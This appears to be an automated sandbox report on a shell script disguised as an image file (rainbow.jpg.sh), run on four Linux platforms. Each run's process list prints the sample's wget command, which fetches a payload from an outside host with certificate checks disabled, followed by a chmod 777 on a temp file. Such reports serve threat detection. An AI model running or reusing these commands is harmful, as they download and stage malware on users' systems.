Malware Analysis Report

2024-12-07 17:04

Sample ID 241113-gx7bvsxape
Target rainbow.jpg.sh
SHA256 890052a39bc73bb14a53c4efa92a87d0b94dff56a1af0a39884059bdbd9ac2fa
Tags
defense_evasion
score
7/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
7/10

SHA256

890052a39bc73bb14a53c4efa92a87d0b94dff56a1af0a39884059bdbd9ac2fa

Threat Level: Shows suspicious behavior

The file rainbow.jpg.sh was found to be: Shows suspicious behavior.

Malicious Activity Summary

defense_evasion

File and Directory Permissions Modification

Writes file to tmp directory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-13 06:12

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-13 06:12

Reported

2024-11-13 06:14

Platform

ubuntu1804-amd64-20240611-en

Max time kernel

0s

Max time network

128s

Command Line

[/tmp/rainbow.jpg.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/tmp.cwW5Sdp2dc /bin/mktemp N/A
File opened for modification /tmp/tmp.cwW5Sdp2dc /usr/bin/wget N/A

Processes

/tmp/rainbow.jpg.sh

[/tmp/rainbow.jpg.sh]

/usr/bin/dirname

[dirname -- /tmp/rainbow.jpg.sh]

/bin/mktemp

[mktemp]

/usr/bin/wget

[wget -O /tmp/tmp.cwW5Sdp2dc https://cryptor.live/crypt/ct872/api/6c32NmxVIhq5PMiRqFtg3YtQapLydYti --header Host: cryptor.biz --no-check-certificate --retry-connrefused --waitretry=1 --read-timeout=20 --timeout=15 -t 0]

/bin/chmod

[chmod 777 /tmp/2.jpg]

Network

Country Destination Domain Proto
US 1.1.1.1:53 cryptor.live udp
US 1.1.1.1:53 cryptor.live udp
N/A 224.0.0.251:5353 udp
GB 185.125.188.62:443 tcp
GB 185.125.188.62:443 tcp
US 151.101.1.91:443 tcp
US 151.101.1.91:443 tcp
GB 195.181.164.15:443 tcp

Files

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-13 06:12

Reported

2024-11-13 06:14

Platform

debian9-armhf-20240729-en

Max time kernel

1s

Max time network

2s

Command Line

[/tmp/rainbow.jpg.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/tmp.WZ6zjdRO1H /bin/mktemp N/A
File opened for modification /tmp/tmp.WZ6zjdRO1H /usr/bin/wget N/A

Processes

/tmp/rainbow.jpg.sh

[/tmp/rainbow.jpg.sh]

/usr/bin/dirname

[dirname -- /tmp/rainbow.jpg.sh]

/bin/mktemp

[mktemp]

/usr/bin/wget

[wget -O /tmp/tmp.WZ6zjdRO1H https://cryptor.live/crypt/ct872/api/6c32NmxVIhq5PMiRqFtg3YtQapLydYti --header Host: cryptor.biz --no-check-certificate --retry-connrefused --waitretry=1 --read-timeout=20 --timeout=15 -t 0]

/bin/chmod

[chmod 777 /tmp/2.jpg]

Network

Country Destination Domain Proto
US 1.1.1.1:53 cryptor.live udp

Files

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-11-13 06:12

Reported

2024-11-13 06:14

Platform

debian9-mipsbe-20240418-en

Max time kernel

1s

Max time network

2s

Command Line

[/tmp/rainbow.jpg.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/tmp.j1h9hwjaTf /bin/mktemp N/A
File opened for modification /tmp/tmp.j1h9hwjaTf /usr/bin/wget N/A

Processes

/tmp/rainbow.jpg.sh

[/tmp/rainbow.jpg.sh]

/usr/bin/dirname

[dirname -- /tmp/rainbow.jpg.sh]

/bin/mktemp

[mktemp]

/usr/bin/wget

[wget -O /tmp/tmp.j1h9hwjaTf https://cryptor.live/crypt/ct872/api/6c32NmxVIhq5PMiRqFtg3YtQapLydYti --header Host: cryptor.biz --no-check-certificate --retry-connrefused --waitretry=1 --read-timeout=20 --timeout=15 -t 0]

/bin/chmod

[chmod 777 /tmp/2.jpg]

Network

Country Destination Domain Proto
US 1.1.1.1:53 cryptor.live udp
US 172.67.190.23:443 cryptor.live tcp

Files

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2024-11-13 06:12

Reported

2024-11-13 06:14

Platform

debian9-mipsel-20240418-en

Max time kernel

1s

Max time network

3s

Command Line

[/tmp/rainbow.jpg.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/tmp.jf2YkswMoM /bin/mktemp N/A
File opened for modification /tmp/tmp.jf2YkswMoM /usr/bin/wget N/A

Processes

/tmp/rainbow.jpg.sh

[/tmp/rainbow.jpg.sh]

/usr/bin/dirname

[dirname -- /tmp/rainbow.jpg.sh]

/bin/mktemp

[mktemp]

/usr/bin/wget

[wget -O /tmp/tmp.jf2YkswMoM https://cryptor.live/crypt/ct872/api/6c32NmxVIhq5PMiRqFtg3YtQapLydYti --header Host: cryptor.biz --no-check-certificate --retry-connrefused --waitretry=1 --read-timeout=20 --timeout=15 -t 0]

/bin/chmod

[chmod 777 /tmp/2.jpg]

Network

Country Destination Domain Proto
US 1.1.1.1:53 cryptor.live udp
US 104.21.65.117:443 cryptor.live tcp

Files

N/A